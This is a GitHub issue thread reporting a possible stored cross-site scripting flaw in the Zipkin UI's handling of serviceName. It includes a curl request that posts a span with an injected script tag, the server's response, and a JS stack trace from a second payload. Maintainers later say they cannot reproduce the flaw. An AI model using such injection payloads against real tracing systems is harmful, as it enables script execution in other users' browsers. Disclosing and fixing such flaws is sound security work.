### ISSUE TITLE
Persistent Cross-Site Scripting (XSS) - Zipkin UI 

### ISSUE THREAD

**Issue by snsingh** [openzipkin/zipkin#2359]
## Describe the Bug

Zipkin client-side sanitization library only escapes **annotations->values** & **tags->properties** for XSS attacks but fails to do the same for localEndpoint->serviceName & remoteEndpoint->serviceName. This allows an attacker to store persistent XSS payloads into span information stored in persistent Cassandra store. I also suspect that traceId & id may be vulnerable to the same attack but currently other checks while insertion return Cannot decode spans which avoid XSS via those parameters.

The exception is thrown on manipulating traceId & id:

https://github.com/openzipkin/zipkin/blob/master/zipkin-collector/core/src/main/java/zipkin2/collector/Collector.java#L118-L141

### Malicious data span
```
curl -s https://localhost/api/v2/spans -H'Content-Type: application/json' -d '[{
  "traceId": "ab5aa5e5661c95a8",
  "id": "bad160f0fd2d9a99",
  "name": "",
  "timestamp": 1546646352588,
  "duration": 6650,
  "annotations": [
    {
      "timestamp": 1546646352588,
      "value": "test 1",
      "endpoint": {
        "serviceName": "unknown",
        "ipv4": "192.168.182.54"
      }
    },
    {
      "timestamp": 1546646352588,
      "value": "Annotation 2",
      "endpoint": {
        "serviceName": "unknown",
        "ipv4": "192.168.182.54"
      }
    },
    {
      "timestamp": 1546646352588,
      "value": "test 3",
      "endpoint": {
        "serviceName": "unknown",
        "ipv4": "192.168.182.54"
      }
    }
  ],
    "localEndpoint": {
      "serviceName": "mobile-gateway<script>alert(1)</script>",
      "ipv4": "172.17.0.255"
    },
    "remoteEndpoint": {
      "ipv4": "110.170.201.178",
      "port": 39308
    },
    "tags": {
      "http.method": "OPTIONS",
      "http.path": "/mobile-gateway/content/personal"
    }
}]' -v
> POST /api/v2/spans HTTP/1.1
> Host: localhost
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Type: application/json
> Content-Length: 1088
> Expect: 100-continue
>
< HTTP/1.1 100 Continue
* We are completely uploaded and fine
< HTTP/1.1 202 Accepted
< Server: AppleHttpServer/7534b10f
< Date: Mon, 07 Jan 2019 19:27:51 GMT
< Content-Length: 0
< Connection: keep-alive
< vary: origin
< X-B3-TraceId: a9530e599ade603d
< X-PLB-Responding-Instance: plbproxy001.usnkq06d.pie.apple.com
< X-PLB-Responding-Upstream: 17.147.52.245:31152
< X-PLB-Upstream-Response: 202
< Strict-Transport-Security: max-age=31536000
```

### JS Stacktrace:
```
Payload: <script>throw console.trace()</script>

Trace:
console.trace() 3 ab5aa5e5661c95a8:1:7
    <anonymous> https://localhost/zipkin/traces/ab5aa5e5661c95a8:1:7
    o jquery.js:111
    P jquery.js:5762
    append jquery.js:5898
    t.default</this.show/< spanPanel.js:93:6
    each jquery.js:354
    t.default</this.show spanPanel.js:82:4
    dispatch jquery.js:5182
    add/_.handle jquery.js:4991
    trigger jquery.js:8249
    trigger/< jquery.js:8327
    each jquery.js:354
    each jquery.js:189
    trigger jquery.js:8326
    d/this.trigger flight.js:1291
    t.default</this.showSpanDetails trace.js:315:4
    t.default</this.handleClick trace.js:207:6
    dispatch jquery.js:5182
    add/_.handle jquery.js:4991
```

Current Clientside XSS Sanitization on annotations->values & tags->properties: https://github.com/openzipkin/zipkin/blob/master/zipkin-ui/js/component_ui/spanPanel.js#L5-L18

I am wondering if someone can help me find where can I introduce a similar fix. I am new to js and UI development, so any help and pointers will be much appreciated.

Thanks.

## Addded some snapshots of the problem

<img width="1451" alt="image" src="https://user-images.githubusercontent.com/1771550/51556839-2173a000-1e30-11e9-8348-87aae3f16abe.png">

<img width="1409" alt="image" src="https://user-images.githubusercontent.com/1771550/51556859-29cbdb00-1e30-11e9-81b1-5c9e78757f13.png">

<img width="1329" alt="image" src="https://user-images.githubusercontent.com/1771550/51556875-351f0680-1e30-11e9-8fac-03be1a24fe12.png">

**Comment by codefromthecrypt** [comment]
for context, the ui uses the sub path /zipkin which does not permit POST
requests.

I am wondering why in this case this is classified as a cross site attack
as the attacker cannot control the data displayed (or maybe I am missing
something?)

**Comment by snsingh** [comment]
I believe the issue is similar to the one addressed in issue# [1623 ](https://github.com/openzipkin/zipkin/issues/1623) hence the similar classification.

I might be wrong though, so please feel free to correct the classifications and any other discrepancies that might be there in my post.

Thanks.


> for context, the ui uses the sub path /zipkin which does not permit POST requests. I am wondering why in this case this is classified as a cross site attack as the attacker cannot control the data displayed (or maybe I am missing something?)
> […](#)

**Comment by codefromthecrypt** [comment]
ok to answer question directly I can help find the code you are asking
about but bear in mind the ui is being replaced. there is a directory
zipkin-lens with the new code. you might want to have a look there if
concerned

**Comment by snsingh** [comment]
That would be great @adriancole . I will also look into the zipkin-lens directory.


> ok to answer question directly I can help find the code you are asking about but bear in mind the ui is being replaced. there is a directory zipkin-lens with the new code. you might want to have a look there if concerned
> […](#)

**Comment by codefromthecrypt** [comment]
we can't currently reproduce this in either UI. perhaps recently we fixed it
